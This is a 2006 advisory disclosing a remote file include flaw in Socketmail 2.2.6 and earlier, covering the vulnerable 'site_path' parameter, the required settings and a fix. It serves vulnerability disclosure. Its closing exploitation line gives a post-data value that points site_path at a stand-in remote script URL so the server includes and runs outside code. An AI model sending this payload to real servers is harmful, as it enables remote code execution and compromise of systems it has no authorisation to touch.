[MajorSecurity #6]Socketmail <= 2.2.6 - Remote File Include Vulnerability
[MajorSecurity]Socketmail <= 2.2.6 - Remote File Include Vulnerability
--------------------------------------------------------
Software: Socketmail
Version: <=2.2.6
Type: Remote File Include Vulnerability
Date: May, 25th 2006
Vendor: Creative Digital Resources
Page: http://socketmail.com
Risc: High
Credits:
----------------------------
'Aesthetico'
http://www.majorsecurity.de
Affected Products:
----------------------------
Socketmail Lite 2.2.6 and prior
Socketmail Pro 2.2.6 and prior
Description:
----------------------------
SocketMail is a powerful, scalable and fully customisable e-mail solution.
Ideal messaging solution for sizes web site and enterprises.
Requirements:
----------------------------
register_globals = On
magic_quotes = On
Vulnerability:
----------------------------
Input passed to the "site_path" parameter in "index.php" and "inc-common.php"
is not
properly verified, before it is used to include files.
This can be exploited to execute arbitrary code by including files from
external resources.
Solution:
----------------------------
Edit the source code to ensure that input is properly sanitised.
Set "register_globals" to "Off".
Exploitation:
----------------------------
Post data:
site_path=http://www.yourspace.com/yourscript.php?